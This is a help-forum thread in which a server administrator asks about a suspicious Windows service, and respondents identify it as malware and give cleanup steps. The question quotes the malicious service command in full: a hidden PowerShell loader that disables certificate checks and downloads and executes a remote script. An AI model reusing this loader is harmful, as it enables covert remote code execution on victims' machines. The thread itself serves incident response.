Some Weird services found in services.msc of one of our server

Question

Hi,

S1 Screenshots - SEQGDCVMC179.pdf,

Some Weird services found in services.msc of one of our server, it showing

Path mentioned of executable is -

 C:\Windows\system32\cmd.exe /C "cmd /c powershell.exe -NoP -NonI -W Hidden "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){iex(New-Object Net.WebClient).DownloadString('/in6.ps1');}else{iex(New-Object Net.WebClient).DownloadString('/in3.ps1');}""

Can we suspect this as a malware and if so how to get rid of it? We are having EDR software installed. but nothing is detected in the same. The server installed only 2 month back these type of services observed suddenly.

Thanks in advance,

Sadanand.

Answer 1

Sure looks like Malware. Cmd.exe cannot function as a true service as it does not have the needed entry points. And the script is loading a web address from file, downloading something (more powershell commands) and executing them.

I would start by alerting your manager and your security team that you have encountered some suspicious activity.

I did a search on in6.ps1 and in3.ps1 and came across these. (This site may not like these links, change xx to tt.)

hxxps://asec.ahnlab.com/en/16564/

hxxps://www.cybereason.com/blog/research/wannamine-cryptominer-eternalblue-wannacry

Your security team may want to do an analysis of what that code did (or might do). You should try to figure out if the infection has spread or if any of your data was stolen/compromised. That would require you to download the actual malware payload and evaluate the code.

Also note the "2. Registering WMI Event Filter" in the first link. The malware may have hidden itself within WMI. Check other machines on your network to see if they also have those odd service names.

Start by opening a Powershell window with "run as administrator" and search for those files. They are probably in System32, but you want to scan the entire drive to see if they are anywhere else.

Get-ChildItem -Path c:\ -force -include in6.ps1,in3.ps1 -recurse -ea SilentlyContinue | ft -Property CreationTime, LastWriteTime, FullName

That might give you a date and time as to when your server was initially infected. You might be able to trace that back to someone or to some event that occurred. You will want to try and figure out how those files and services got there. And what admin might have initiated the infection.

To clean your server, start with Microsoft's Malicious Software Removal Tool.

mrt.exe /f

If it doesn't report that it found anything, then next run a Defender (or 3rd party AV) full scan. If they don't detect the malware, then I would suggest installing Malwarebytes and try running its scan.

You can use sc.exe to delete those services.

sc.exe delete TheWierdServiceName

And make sure you fully update all machines with Windows Update.

Answer 2

The names of the services alone would make me suspicious!
The file "in6.ps1" has been identified as a potential problem. The file "in3.ps1" can also be found, but less often since it's only used if the machine is running 32-bit software.

The code is probably just dropping a file on some scheduled basis. But the file probably contains information instructing the service(s) to do something.

Here's an example:

https://any.run/report/61b5934940e218f942aaef0c7efdad99b4a210a1d9c3ccc01b276cdee04c5aa3/044cb3b4-6d70-49b2-942c-3c5b796ff8df

Check for any files that are run during system start-up, either as scheduled tasks or via the run/runonce registry keys.

You should engage your AV vendor for help in removing all of this malware